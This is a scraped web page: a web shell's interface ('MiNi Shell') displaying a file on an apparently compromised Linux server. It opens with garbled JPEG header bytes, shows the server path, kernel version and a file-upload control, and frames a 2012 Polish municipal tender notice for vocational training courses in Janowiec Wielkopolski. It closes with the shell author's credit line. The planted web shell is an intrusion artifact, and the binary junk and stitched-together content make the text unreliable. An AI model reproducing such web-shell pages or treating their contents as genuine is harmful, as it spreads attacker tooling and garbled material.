JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/113412-N-2012.html

<p class="kh_header"><b>Janowiec Wielkopolski: Organizacja i przeprowadzenie szkoleń w ramach Projektu Uwierz w siebie - zacznij od nowa</b><br>
<b>Numer ogłoszenia: 113412 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Strzelecka 8, 88-430 Janowiec Wielkopolski, woj. kujawsko-pomorskie, tel. 52 3026068, faks 52 3026068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.janowiec.wlkp.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń w ramach Projektu Uwierz w siebie - zacznij od nowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.OPIS PRZEDMIOTU ZAMÓWIENIA

Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla Uczestników realizowanego przez Zamawiającego Projektu Uwierz w siebie - zacznij od nowa (zwanego dalej Projektem), Priorytet VII PO KL, Działanie 7.1, Poddziałanie 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013 

Zamawiający dopuszcza składanie ofert częściowych, gdzie część stanowi zadanie nr:

1.	Kurs obsługi wózków jezdniowych

Kurs przygotowania zawodowego w kierunku obsługi wózków jezdniowych zostanie przeprowadzony dla 7 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 67 godzin zegarowych, w tym 47 godzin zajęć teoretycznych i 20 godzin zajęć praktycznych

2.Kurs pielęgnacji i upiększania paznokci

Kurs przygotowania zawodowego w kierunku pielęgnacji i upiększania paznokci zostanie przeprowadzony dla 3 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 40 godzin zegarowych, w tym 10 godzin zajęć teoretycznych i 30 godzin zajęć praktycznych

3.Kurs przygotowania zawodowego w kierunku opiekuna środowiskowego

Kurs przygotowania zawodowego w kierunku opiekuna środowiskowego zostanie przeprowadzony dla 9 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 160 godzin zegarowych, w tym 90 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych

4.Kurs spawania metodą MAG

Kurs przygotowania zawodowego w kierunku spawania metodą MAG zostanie przeprowadzony dla 4 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski.

Kurs zostanie przeprowadzony w ilości 145 godzin zegarowych, w tym 25 godzin zajęć teoretycznych i 120 godzin zajęć praktycznych


5.Kurs przygotowania zawodowego w kierunku kucharza małej gastronomii

Kurs przygotowania zawodowego w kierunku kucharza małej gastronomii zostanie przeprowadzony dla 4 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 180 godzin zegarowych, w tym 60 godzin zajęć teoretycznych i 120 godzin zajęć praktycznych.

6.Kurs przygotowania zawodowego w kierunku sprzedawcy z obsługa kasy fiskalnej oraz HACCP

Kurs przygotowania zawodowego w kierunku sprzedawcy z obsługa kasy fiskalnej oraz HACCP zostanie przeprowadzony dla 13 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 80 godzin zegarowych, w tym 65 godzin zajęć teoretycznych i 15 godzin zajęć praktycznych.

7.Kurs obsługi komputera

Kurs przygotowania zawodowego w kierunku obsługi komputera zostanie przeprowadzony dla 7 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski.

Kurs zostanie przeprowadzony w ilości 50 godzin zegarowych, w tym 5 godzin zajęć teoretycznych i 45 godzin zajęć praktycznych

8.Kurs języka angielskiego

Kurs języka angielskiego zostanie przeprowadzony dla 9 osób, zagrożonych wykluczeniem społecznym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Kurs zostanie przeprowadzony w ilości 60 godzin zegarowych zajęć teoretycznych

Warunki wspólne dla części zamówienia od 1 do 8, jakie musi spełnić Wykonawca:

Kursy zostaną przeprowadzone w terminie uzgodnionym z Zamawiającym, przy czym kursy muszą zakończyć się do dnia 30 listopada 2012 roku

Kursy zawodowe należy zorganizować i przeprowadzić w części teoretycznej i praktycznej, natomiast kurs językowy w części teoretycznej, zgodnie z obowiązującymi przepisami, w ilości godzin umożliwiający przystąpienie do egzaminu oraz uzyskaniu pełnych uprawnień po ukończeniu danego kursu

Kursy należy przeprowadzić z każda grupą odrębnie stosownie do rodzaju kursu

Kursy będą prowadzone w miejscowości Janowiec Wielkopolski lub Żnin

W przypadku kursów, które odbywać się będą poza Janowcem Wielkopolskim Wykonawca musi zapewnić uczestnikom zwrot kosztów dojazdu

Zajęcia w ramach kursów powinny odbywać się w systemie tygodniowym od poniedziałku do piątku, maksymalnie 5 godzin dziennie w godzinach od 9.00 do 14.00.

Wykonawca powinien dostosować ilość i jakość pomieszczeń do zajęć teoretycznych i zajęć praktycznych

Wykonawca powinien wyposażyć uczestników kursów w sprzęt i pomoce dydaktyczne niezbędne do prowadzenia danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków pracy

Wykonawca powinien zapewnić uczestnikom kursów poczęstunek oraz napoje.

Wykonawca, który złoży najkorzystniejszą ofertę przedstawi przy zawieraniu umowy konspekt godzinowy do realizacji programu nauczania odpowiedniego kursu, w ramach ilości godzin przeznaczonych na naukę w danym kursie, zgodnie z wiedzą, doświadczeniem i obowiązującym prawem dotyczącym organizacji kursów

Wykonawca w ramach oferowanej ceny zapewni każdemu uczestnikowi materiały dydaktyczne/szkoleniowe, które z chwilą przekazania będą stanowiły jego własność.

Zamawiający wymaga aby wykonawca w swojej ofercie uwzględnił wszystkie koszty związane z organizacją i realizacją kursów

9.Kurs prawa jazdy kategorii B

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów prawa jazdy kategorii B

Kursy zostaną przeprowadzone łącznie dla 12 osób, klientów Miejsko - Gminnego Ośrodka Pomocy Społecznej w Janowcu Wielkopolskim, zagrożonych wykluczeniem społecznym i zawodowym, bezrobotnych (w tym długotrwale) lub nieaktywnych zawodowo, będących w wieku aktywności zawodowej, mieszkańców Gminy Janowiec Wielkopolski

Szkolenie zostanie przeprowadzone w terminie uzgodnionym z Zamawiającym, przy czym szkolenie musi zakończyć się do dnia 31 października 2012 roku. 

Kursy należy zorganizować i przeprowadzić w części teoretycznej i praktycznej:
a)Zajęcia teoretyczne w ilości 30 h dydaktycznych (1 godz. dydaktyczna = 45 min)
b)Zajęcia praktyczne w ilości 30 h zegarowych

Kurs będzie przeprowadzony w części teoretycznej i praktycznej (plac manewrowy) w miejscowości Janowiec Wielkopolski

Zajęcia odbywać się będą od poniedziałku do piątku nie wcześniej niż od godziny 7.00 i nie dłużej niż do godziny 20.00, jednakże nie więcej niż 8 godzin dziennie. Dopuszcza się zajęcia w część sobót, nie dłużej niż do godziny 15.00. Wykonawca powinien dostosować jakość pomieszczeń do zajęć teoretycznych

Wykonawca zobowiązany jest wyposażyć uczestników kursów w sprzęt i pomoce dydaktyczne niezbędne do prowadzenia danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków pracy

Wykonawca w ramach oferowanej ceny zapewni każdemu uczestnikowi materiały dydaktyczne/szkoleniowe, które z chwilą przekazania będą stanowiły jego własność.

Wykonawca zapewni uczestnikom przeprowadzenie badań lekarskich oraz dojazd do Ośrodka Ruchu Drogowego na egzamin

Zamawiający wymaga aby wykonawca w swojej ofercie uwzględnił wszystkie koszty związane z organizacją i realizacją kursów


Zamawiający dopuszcza możliwość składania ofert częściowych

Zamawiający nie dopuszcza możliwości składania ofert wariantowych 

Oznaczenie według Wspólnego Słownika Zamówień 
Wspólny Słownik Zamówień 

80580000-3 - Oferowanie kursów językowych
80530000-8 - Usługi szkolenia zawodowego 
80411200-0 - Usługi szkół nauki jazdy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3, 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Wykonawca posiada uprawnienia do wykonywania działalności lub czynności objętej niniejszym postępowaniem, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień, w tym w szczególności Wykonawca jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę Wykonawcy, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27.10.2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365); Na potwierdzenie spełniania ww. warunków Wykonawca załącza do oferty oświadczenia i dokumenty, o których mowa w pkt. 7 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA / NIE SPEŁNIA, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Na potwierdzenie spełniania ww. warunków Wykonawca załącza do oferty oświadczenia i dokumenty, o których mowa w pkt. 7 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA / NIE SPEŁNIA, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Na potwierdzenie spełniania ww. warunków Wykonawca załącza do oferty oświadczenia i dokumenty, o których mowa w pkt. 7 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA / NIE SPEŁNIA, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Na potwierdzenie spełniania ww. warunków Wykonawca załącza do oferty oświadczenia i dokumenty, o których mowa w pkt. 7 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA / NIE SPEŁNIA, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Na potwierdzenie spełniania ww. warunków Wykonawca załącza do oferty oświadczenia i dokumenty, o których mowa w pkt. 7 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA / NIE SPEŁNIA, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.1 Wzór Umowy stanowi załącznik do SIWZ 
18.2 Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na następujących warunkach:
	
- warunki oraz termin płatności, w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego, 
- sposób wykonania przedmiotu zamówienia (np. miejsca wykonania zamówienia), w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia, lub wynika to z okoliczności korzystnych dla Zamawiającego, 
- termin wykonania przedmiotu zamówienia w przypadku pojawienia się przeszkody w jego wykonaniu w przewidzianym terminie, w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego lub w przypadku możliwości wprowadzenia korzystnych dla Zamawiającego rozwiązań, które w szczególności pozwolą skrócić okres realizacji zamówienia,
- zmiana wysokości wynagrodzenia o kwotę wynikającą ze stawek podatku od towarów i usług obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.janowiec.wlkp.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Ośrodek Pomocy Społecznej  w Janowcu Wielkopolskim ul. Strzelecka 8 88 - 430 Janowiec Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 09:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej  w Janowcu Wielkopolskim ul. Strzelecka 8 88 - 430 Janowiec Wielkopolski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Uwierz w siebie - zacznij od nowa współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com